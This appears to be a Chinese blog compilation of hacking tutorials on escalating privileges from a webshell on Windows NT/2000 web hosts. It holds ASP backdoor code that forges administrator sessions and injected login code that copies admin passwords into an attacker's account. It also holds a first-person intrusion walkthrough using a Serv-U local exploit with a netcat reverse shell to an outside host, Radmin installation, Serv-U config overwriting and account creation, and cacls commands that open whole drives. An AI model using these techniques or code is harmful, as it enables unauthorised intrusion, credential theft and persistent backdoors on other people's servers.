例:cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\httpext.dll" "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\system32\\msw3prt.dll"

這樣就可以了,當你再用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 這個語句查之時,如果沒有看見asp.dll,

說明,asp的權限又恢復到以前的權限.

winNT/2000提升權限

Windows NT/2000 通用的提升方法

攻擊者在獲得系統一定的訪問權限后通常要把自己的權限提升到管理員組,這樣攻擊者就控制了該計算機系統。這主要有以下幾種方法:1.獲得管理員密碼,下次就可以用該密碼進入系統; 2. 先新建一個用戶,然后把這個普通添加到管理員組,或者干脆直接把一個不起眼的用戶如guest 添加到管理員組; 3. 安裝后門。

方法1 :下載系統的 %windir%\\repair\\sam.*(WinNT 4 下是sam._ 而Windows2000下是sam )文件,然后用L0pht 等軟件進行破解,只要能拿到,肯花時間,就一定可以破解。

問題:(1 )攻擊者不一定可以訪問該文件(看攻擊者的身份和管理員的設置);(2 )這個文件是上次系統備份時的帳號列表(也可能是第一次系統安裝時的),以后更改帳號口令的話,就沒用了。

方法2 :使用pwdump(L0pht 自帶的,Windows 2000下無效)或者pwdump2 ,取得系統當前的用戶列表和口令加密列表,然后用L0pht 破解這個列表。

問題:普通用戶不能成功運行pwdump類程序(沒有權限),例如:使用unicode漏洞進入系統時是IUSR_computer 身份,該用戶一般只屬于guests組的,運行pwdump類程序就會失敗。

(以上兩種是離線的)

方法3 :使用 Enum 等程序進行遠程破解,猜口令。enum可以使用指定的字典對遠程主機的某個用戶進行破解。

問題:(1 )如果系統設置了帳號鎖定的話,破解幾次失敗,該帳號就鎖定了,暫時不能再破解;(2 )要遠程系統開放 Netbios連接,就是 TCP的139 端口,如果用防火墻過濾了的話 Enum 就無法連接到主機。

(以上方法是通過破解獲得密碼的,還有直接把當前用戶提升權限或者添加用戶到管理員組的方法。)

方法4 :GetAdmin(WinNT 4 下)、PipeUpAdmin (Windows 2000下),在本機運行可以把當前用戶帳號加入管理員組。而 PipeUpAdmin則比較厲害,普通用戶和Guests組用戶都可以成功運行。

問題:GetAdmin在 SP4有補丁修復了,不能用于高于 SP4的 WinNT 4系統,當然后來又有GetAdmin的增強版本,不過在 SP6a下好像都不能成功運行。

注:這一方法利用了 WinNT 4系統的安全漏洞,可以安裝補丁解決這一問題。

(此外還有變通的方法。)

方法5 :在WinNT 4 和 Windows 2000 注冊表里指定用戶Shell 程序(Explorer.exe)

時沒有使用絕對路徑,而是使用了一個相對路徑的文件名(考慮到兼容性問題)。

由于在系統啟動時程序的搜索順序問題使得 %Systemdrive%\\Explorer.exe(操作系統安裝的跟目錄下的Explorer.exe)程序執行,這提供了攻擊者一個機會在用戶下次登錄時執行他自己的程序。

問題:攻擊者必須有安裝系統邏輯盤跟目錄的寫權限才行,而一般管理員都設置該目錄普通用戶禁寫。

注:這種方法利用了 WinNT 4/Windows 2000 系統的安全漏洞,可以安裝補丁解決這種問題。

方法6 :木馬:上傳木馬,然后運行木馬,系統重起動后,木馬就是本地登錄用戶的身份了,然后攻擊者連接后就有了本地登錄用戶的權限。因為一般總是管理員本地登錄系統,因此這樣很可能就獲得了管理員的權限。

問題:(1 )殺毒軟件或病毒防火墻可能阻止木馬運行,還有可能把木馬殺死。

(2 )有的木馬不能在Guests組身份下運行,這可能與它添加自動運行的方式有關;如沒有權限改寫注冊表的自動運行位置,不能寫入%system% \\ system32目錄(一般的木馬都改變文件名,然后寫入系統目錄,如果沒有寫入權限系統目錄,就不能成功執行木馬)。

解決:不過也有用壓縮程序(不是通常說的壓縮程序,這種壓縮程序把可執行程序壓縮后,文件變小了,但是仍然可以正常執行)將木馬壓縮,從而逃過殺毒軟件的特征碼檢測。我曾使用Aspack成功壓縮了一個木馬,逃過了金山毒霸正式版的檢測。不過也有的木馬Aspack壓縮不了,如冰河。

方法7 : Gina、GinaStub木馬。雖然這個也叫木馬,但是它的功能和上邊的那種大不相同,因為一般的木馬是在對方安裝一個server端,一旦運行就可以使用client端連接到server端,并進行操作。而 ginastub 一般只有一個動態連接庫文件,需要手工安裝和卸載,他的功能也不是使用 client端控制server端,它僅僅就是捕獲用戶的登錄密碼。

問題:安裝較麻煩,成功的可能性低,而且安裝不當會造成被安裝的系統不能啟動。

注:這一方法利用的不是系統的安全漏洞,因此不能通過安裝補丁解決這一問題。關于Gina,可以參見我的另一篇文章《WinLogon登錄管理和GINA簡介》

方法8 :本地溢出。緩沖區溢出是進行攻擊的最好辦法,因為一般都可以獲得系統權限或者管理員權限;不過很多遠程溢出攻擊不需要事先有執行程序的權限,而本地溢出就恰好適合提升權限。Win NT4 的 IIS4 的 ASP擴展有一個本地溢出漏洞,Windows 2000的靜態圖像服務也有一個溢出漏洞,利用該漏洞,攻擊者可以獲得系統權限。當然 Windows NT 和 Windows 2000 還有很多程序有溢出漏洞,這是這些程序不是總在運行,因此被利用的可能性比較小。

問題:(1 )ASP 擴展的溢出漏洞需要攻擊者有向網站的腳本目錄的寫權限,才能把攻擊程序放到網站上,然后執行。

(2 )靜態圖像服務缺省沒有安裝,只有用戶在 Windows 2000 上安裝靜態圖像設備(如數碼相機、掃描儀等)時才自動安裝。

注:這種方法利用了 WinNT 4/Windows 2000 系統的安全漏洞,可以安裝補丁解決這種問題。

Windows 2000專用提升漏洞方法方法1 : Windows 2000 的輸入法漏洞,利用這個漏洞任何人可以以LocalSystem 身份執行程序,從而可以用來提升權限,不過該漏洞一般限于物理接觸 Windows 2000 計算機的人。當然如果開放了終端服務的話,攻擊者也可以遠程利用該漏洞。

注:這一方法利用了 Windows 2000 系統的安全漏洞,可以安裝補丁解決這一問題。

方法2 :利用 Windows 2000 的 Network DDE DSDM 服務漏洞普通用戶可以LocalSystem 身份執行任意程序,可以借此更改密碼、添加用戶等。Guests組用戶也可以成功利用該漏洞。

問題:這個服務缺省沒有啟動,需要啟動這個服務。

注:這一方法利用了 Windows 2000 系統的安全漏洞,可以安裝補丁解決這一問題。

方法3 :Windows 2000的 TELNET 服務進程建立時,該服務會創建一個命名管道,并用它來執行命令。但是,該管道的名字能被預見。如果 TELNET 發現一個已存在的管道名,它將直接用它。攻擊者利用此漏洞,能預先建立一個管道名,當下一次 TELNET 創建服務進程時,便會在本地 SYSTEM 環境中運行攻擊者代碼。

注:這一方法利用了 Windows 2000 系統的安全漏洞,可以安裝補丁解決這一問題。

方法 4 :WINDOWS 2K存在一個利用 Debug Registers提升權限的漏洞。如果攻擊者能在 WIN2K中運行程序,利用此漏洞,他至少能取得對 %Windir%\\SYSTEM32和注冊表HKCR的寫權。因為x86 Debug Registers DR0-7 對于所有進程都是全局共享的,因此在一個進程中設置硬件斷點,將影響其它進程和服務程序。

注:這一方法利用了 Windows 2000 系統的安全漏洞,不過到目前為止微軟仍然沒有補丁可以安裝,但是漏洞攻擊程序已經出現了,因此只能堵住攻擊者的入口來阻止利用該漏洞。

-------------------------------------------------------------------------------- --

-- 巧妙配合asp木馬取得后臺管理權限頂(這個可是經典。。。自己體會我不多說了)

session欺騙篇

首先簡單說一下一般asp系統的身份驗證原理。

一般來說,后臺管理員在登錄頁面輸入賬號密碼后,程序會拿著他提交的用戶名密碼去數據庫的管理員表里面找,如果有這個人的賬號密碼就認為你是管理員,然后給你一個表示你身份的session值。或者程序先把你的用戶名密碼提取出來,然后到數據庫的管理員表里面取出管理員的賬號密碼來和你提交的相比較,如果相等,就跟上面一樣給你個表示你身份的sesion值。然后你進入任何一個管理頁面它都要首先驗證你的session值,如果是管理員就讓你通過,不是的話就引導你回到登錄頁面或者出現一些奇奇怪怪的警告,這些都跟程序員的個人喜好有關。

知道了原理,我們現在的一個思路就是通過我們的asp木馬來修改它的程序然后拿到一個管理員session,這樣的話盡管我們沒有管理員密碼,但是我們一樣在后臺通行無阻了。我把這種方法稱為session欺騙。限于篇幅不能每個系統都能詳細說明,本文僅以動力文章系統為例來說明。

動力文章系統3.51,

其實動力文章系統的所有版本全部通殺,包括動易。大家可以自己實踐一下。

我們先來看一下它的驗證內容。動力文章3.51的驗證頁面在Admin_ChkLogin.asp

,其驗證內容如下:

............

else

rs("LastLoginIP")=Request.ServerVariables("REMOTE_ADDR")

rs("LastLoginTime")=now()

rs("LoginTimes")=rs("LoginTimes")+1

rs.update

session.Timeout=SessionTimeout

session("AdminName")=rs("username")

rs.close

set rs=nothing

call CloseConn()

Response.Redirect "Admin_Index.asp"

前面省略號是用戶名密碼不正確的驗證,直到else,看一下,如果用戶名密碼正確就給你兩個session值:

session.Timeout=SessionTimeout

session("AdminName")=rs("username")

我們在看一下其他管理頁面是怎么驗證session的,admin_index.asp一開始就這樣:

if session("AdminName") = "" then response.Redirect "Admin_Login.asp"end if

看起來似乎很嚴密,但是我們看一下,它這里值驗證一個AdminName的session,只要我們的session內容是AdminName的話不就可以通過了?好,我們開工,先去弄到它的管理員賬號再說,這個不要我教你了吧?到他網站逛一下或者直接一點下載它的數據庫來看都可以知道。我們找個頁面來改一下,我找一個比較沒人而內容較多的頁面FriendSite.asp(友情鏈接頁面)來改,呵呵,這樣管理員也很難查得出來啊。用asp木馬的編輯功能來編輯一下它的內容。在他頁面下隱蔽處加上下面幾句話:

dim id

id=trim(request("qwe"))

if id="120" then

session("AdminName")="admin" '這里是假設的,實際操作中可以改成你想要得管理員賬號

end if

我簡單說一下這句話的意思,就是說從地址欄取得hehe的值,如果hehe=120的話,那么系統就給我們一個值為admin的session。好了,我們輸入看一下,圖二:

看到有什么異常嗎,沒有吧?還是正常頁面,但是我們接著在地址欄中輸入它的后臺管理首頁看看,是不是進去了?

小結一下:我們先找到弄到管理員賬號,然后找到它的驗證頁面,根據它的驗證內容來寫入我們要的后門。不同的系統有不同的驗證方式,比如青創文章系統它不但要驗證你的用戶名還要驗證等級,但是我們總體思路還是一樣,就是他驗證什么我們就加入什么。

密碼竊探篇

可以說上述方法在動網論壇或者其他論壇面前是蒼白無力的,因為一般論壇由于交互性較強,所以在驗證上考慮了很多。以動網為例,你要登錄后臺,他先驗證你有沒有先登錄了前臺,沒有的話就給你返回一個錯誤頁面。你登錄前臺后系統會給你一個seession來記錄你的CacheName和你的ID,然后在你登錄后臺的時候拿出來比較你前后臺身份是否一致,一直就通過,否則kill,面對這樣嚴格的驗證,難道我們就沒有辦法基后臺了嗎?對,沒有了(誰拿雞蛋扔我?這么浪費。),但是我們可以想新的辦法,既然驗證這么嚴格,那么我如果拿著密碼光明正大的進去呢?因此,這里一個新的思路就是拿到它的明文密碼。什么時候有明文密碼呢?對了,就在管理員登錄的時候。好,我們就在那里做手腳,把它登錄的密碼發給我們,然后我們拿和它的密碼去登錄。呵呵,是不是很像 sniffer啊?在下在前幾個月剛和好兄弟潛龍在野利用硬件sniffer配合省網安局的人端掉一個非法電影網站,足足4000G的硬盤,幾十臺服務器,一個字:爽

好了,我們開始修改它的程序。編輯login.asp,加入以下幾句話:

if not isnull(trim(request("username"))) then

if request("username")="admin" then

sql="update [Dv_Vser] set UserEmail=(select userpassword from

[Dv_User]

where username=\'"& request("username")&"\') where

UserName=\'aweige\'"

conn.execute(sql)

end if

end if

這幾句話的意思就是說如果admin(假設的,實際操作中改為你要的管理員名字)登錄成功就更新數據庫,把他的密碼放到我資料的E-mail中。當然,你必須先在論壇里注冊一個用戶名。

還有,如果是動網7.0以下的默認數據庫admin表名和7.0以上有點不一樣,所以實際操作中不可生搬硬套。

后記:

對于以上兩種方法直到目前為止我還想不出任何比較有效的解決方法,因為你的網站被人家放了馬,你根本就沒辦法去阻止人家去插入,要是誰有好的解決方法記得告訴我。

巧用asp木馬和KV2004得到管理員權限

權限太底,二來在瑞星殺天網堵的包圍下很少能活出來的。做個添加用戶權限的bat文件想放到啟動組中去,這個方法雖然有點傻但是有一定的可行性,暈又是權限不夠加不進去。c盤下的 "rogram Files" "winnt" "Documents and Settings"三個文件甲都沒有寫權限,更不要說注冊表了。郁悶了,給管理員留了句話,然后匆匆下線。

第2天上來一看,嘿嘿圖被改回來了,管理員應該發現了,這次更不容易得手。登上 asp木馬進去看了一下,昨天傳上去的幾個exe被刪了,還好asp木馬活下來了,咦!c盤多了文件甲叫 KV2004,原來管理員把瑞星卸了,安了個 kv2004,進Program Files看看確實瑞星被卸了。(這里說一下,大部分的殺毒軟件默認的安裝路徑c:\\Program Files\ \,但是kv默認的安裝路徑是c:\\kv2004\\)到這里機會就來了我們可以把執行文件捆綁在kv2004上,跟隨kv一起啟動。因為 kv不在 "rogram Files" "winnt" "Documents and Settings"這三個文件甲中,很大可能我可以修改

或者上傳文件。行動!在kv2004下隨便找個htm文件刪除:(看看有無寫刪權限)

C:\\>del c:\\kv2004\\GetLicense.htm

拒絕訪問

奇怪了,再來看看文件甲屬性

C:\\>attrib c:\\kv2004

S R C:\\KV2004

哦是只讀。

C:\\>attrib -r -s c:\\kv2004

ok!在試試

C:\\>del c:\\kv2004\\GetLicense.htm

成功了!好寫個起用帳號和提升權限的bat文件,然后把bat文件和kv2004的系統服務文件KVSrvXP.exe捆綁起來,(注意多下種捆綁器,捆綁一

次用kv2004來掃描一次,因為很多捆綁器生成的文件kv會把他作為病毒來處理掉)準備上傳了,先刪掉原來的KVSrvXP.exe。

C:\\>del c:\\kv2004\\KVSrvXP.exe

拒絕訪問

可能是KVSrvXP.exe被windows調用中,刪不掉。沒辦法了嗎?不,刪不掉我改名

C:\\>ren c:\\kv2004\\KVSrvXP.exe kv.exe

OK!然后用asp木馬把修改了的KVSrvXP.exe上傳到kv2004中,接下來就去睡覺把。

4個小時后登上來用:

net user 起用的帳戶

已經在administrators組中,接下來要關防火墻,關殺毒軟件,還是種木馬你隨便我了,哈哈!

我覺得入侵沒什么固定的模式,具體情況具體分析,殺毒軟件同樣也可以幫我們忙,這里我只提供了一種思路。請大家指教。

如何繞過防火墻提升權限

本文講的重點是webshell權限的提升和繞過防火墻,高手勿笑。

廢話少說,咱們進入正題。

首先確定一下目標:http://www.***.com ,常見的虛擬主機。利用Upfile的漏洞相信大家獲得webshell不難。我們這次獲得這個webshell,不是DVBBS,而是自由動力3.6的軟件上傳過濾不嚴。網站http://www.***.com/lemon/Index.asp 是自由動力3.6文章系統。Xr運用 WinHex.exe和WSockExpert.exe上傳一個網頁木馬newmm.asp,用過動鯊的 door.exe的人都知道,這個是上傳asp木馬內容的。于是,上傳海洋2005a,成功獲得webshell。

測試一下權限,在cmd里運行set,獲得主機一些信息,系統盤是D盤,也說明了我們的webshell有運行權限的。那我們看看C盤有什么呢?難道是雙系統?瀏覽后發現沒有什么系統文件,只有一些垃圾文件,暈死。沒關系,再來檢查一下,虛擬主機都有serv-u的,這臺也不例外,是5.0.0.8的。呵呵,是有本地溢出的呀,挖哈哈。

思路:上傳serv-u本地溢出文件srv.exe和nc.exe利用nc來反連接獲得系統shell。大家是不是發現海洋2005a那個上傳的組件不好用(反正我總遇到這個問題),沒關系,用rain改的一個無組件上傳,一共有3個文件,up.htm, upload.asp和 uploadclass.asp。upload.asp和uploadclass.asp上傳到同一個文件夾,up.htm是本地用的,修改up.htm 里的鏈接地址為:http://www.***.com/lemon/upload.asp就可以上傳了。

傳上了srv.exe和nc.exe在H:\\long\\***\\lemon(網站目錄)后,發現沒有運行權限。沒關系,根據經驗,一般系統下 D: \\Documents and Settings\\All Users\\是應該有運行權限的。于是想把文件copy過去,但是發現我們的 webshell沒有對D盤寫的權限,暈死。

可以瀏覽D:\\program files\\serv-u\\ServUDaemon.ini,不能改,難道要破解serv-u的密碼,暈,不想。

不可以這么就泄氣了,我突然想到為什么系統不放在C盤了,難道C盤是FAT32分區的?(后來證明了我們的想法。這里說一下,如果主機有win98的系統盤,那里99%是FAT32分區的。我們還遇到過裝有Ghost的主機,為了方便在DOS下備份,它的備份盤一般都是FAT分區的。)如果系統盤是 FAT32分區,則網站就沒有什么安全性可言了。雖然C盤不是系統盤,但是我們有執行權限。呵呵,copy srv.exe和nc.exe到c:\\,運行 srv.exe "nc.exe –e cmd.exe 202.*.*.* 888",這里的202.*.*.*是我們的肉雞,在這之前我們已經在肉雞上運行了nc –l –p 888。我們在學校內網里,沒有公網ip,不爽-ing。

我們成功獲得一個系統shell連上肉雞。(看起來簡單,其實這里我們也遇到過挫折,我們發現有些版本的nc居然沒有-e這個參數,還以為全世界nc功能都一樣。后來又發現不同版本的nc互連不成功,會出現亂碼,沒辦法用。為此,上傳 n次,錯誤n次,傻了n次,后來終于成功了。做黑客還真得有耐心和恒心。)

高興之余,我們仍不滿足,因為這個shell實在是太慢了。于是,想用我們最常用的Radmin,其實管理員一按Alt+Ctrl+Del,看進程就能發現 r_server了,但是還是喜歡用它,是因為不會被查殺。好了,上傳admdll.dll,raddrv.dll,r_server.exe到H:\\ long\\sun***\\lemon,再用剛才nc得到的 shell把它們copy到d:\\winnt\\system32\\下,分別運行: r_server /install , net start r_server , r_server /pass:rain /save 。

一陣漫長的等待,終于顯示成功了。興沖沖用radmin連上去,發現連接失敗。暈死,忘了有防火墻了。上傳pslist和pskill上去,發現有 backice,木馬克星等。Kill掉他們雖然可以登陸,但服務器重啟后還是不行,終不是長久之計呀。防火墻是不防21,80等端口的,于是,我們的思路又回到了serv-u上了。把他的 ServUDaemon.ini下載下來,覆蓋本機的ServUDaemon.ini,在本機的serv-u上添加一個用戶名為xr,密碼為rain的系統帳號,加上所有權限。再用老辦法,上傳,用shell寫入D:\\program files\\serv-u\ \里,覆蓋掉原來的ServUDaemon.ini。雖然又等了n長時間,但是成功了,于是用flashfxp連上,發生 530錯誤。郁悶,怎么又失敗了。(根據經驗這樣應該就可以了,但為什么不行沒有想通,請高手指點。)

不管了,我們重啟serv-u就ok 了,怎么重啟呢,開始想用 shutdown重啟系統,但那樣我們就失去了nc這個shell,還可能被發現。后來,眼睛一亮,我們不是有pskill嗎?剛才用pslist發現有這個進程:ServUDaemon 。把它kill了。然后再運行D:\\program files\\serv-u\\ ServUAdmin.exe ,這里要注意不是ServUDaemon.exe 。

好了,到這里,我們直接ftp上去吧,ls一下,哈哈,系統盤在我的掌握下。我們能不能運行系統命令呢?是可以的,這樣就可以:

ftp>quote site exec net user xr rain /add

在webshell上運行net user,就可以看見添加成功了。

整個入侵滲透到這就結束了,在一陣后清理打掃后。我們就開始討論了。其實,突破防火墻有很多好的rootkit可以做到的,但是我們覺得系統自帶的服務才是最安全的后門。

CAcls命令在提權中的使用

cacls.exe c: /e /t /g everyone:F #把c盤設置為everyone可以瀏覽

cacls.exe d: /e /t /g everyone:F #把d盤設置為everyone可以瀏覽

cacls.exe e: /e /t /g everyone:F #把e盤設置為everyone可以瀏覽

cacls.exe f: /e /t /g everyone:F #把f盤設置為everyone可以瀏覽

F:\safe\溢出工具\sqlhello2>cacls

顯示或者修改文件的訪問控制表(ACL)

CACLS filename [/T] [/E] [/C] [/G user:perm] [/R user [...]]

[/P user:perm [...]] [/D user [...]]

filename 顯示 ACL。

/T 更改當前目錄及其所有子目錄中

指定文件的 ACL。

/E 編輯 ACL 而不替換。

/C 在出現拒絕訪問錯誤時繼續。

/G user:perm 賦予指定用戶訪問權限。

Perm 可以是: R 讀取

W 寫入

C 更改(寫入)

F 完全控制

/R user 撤銷指定用戶的訪問權限(僅在與 /E 一起使用時合法)。

/P user:perm 替換指定用戶的訪問權限。

Perm 可以是: N 無

R 讀取

W 寫入

C 更改(寫入)

F 完全控制

/D user 拒絕指定用戶的訪問。

在命令中可以使用通配符指定多個文件。

WEB安全,SHELL權限提升技巧大全
文章《WEB安全,SHELL權限提升技巧大全》二維碼
  • 微信打賞
  • 支付寶打賞

已有1條評論

  1. 膠管

    好文章,內容完美無缺.禁止此消息:[email protected]

    2017-08-31 19:07 回復

(必填)

(必填)

(可選)

黑龙江22选5开奖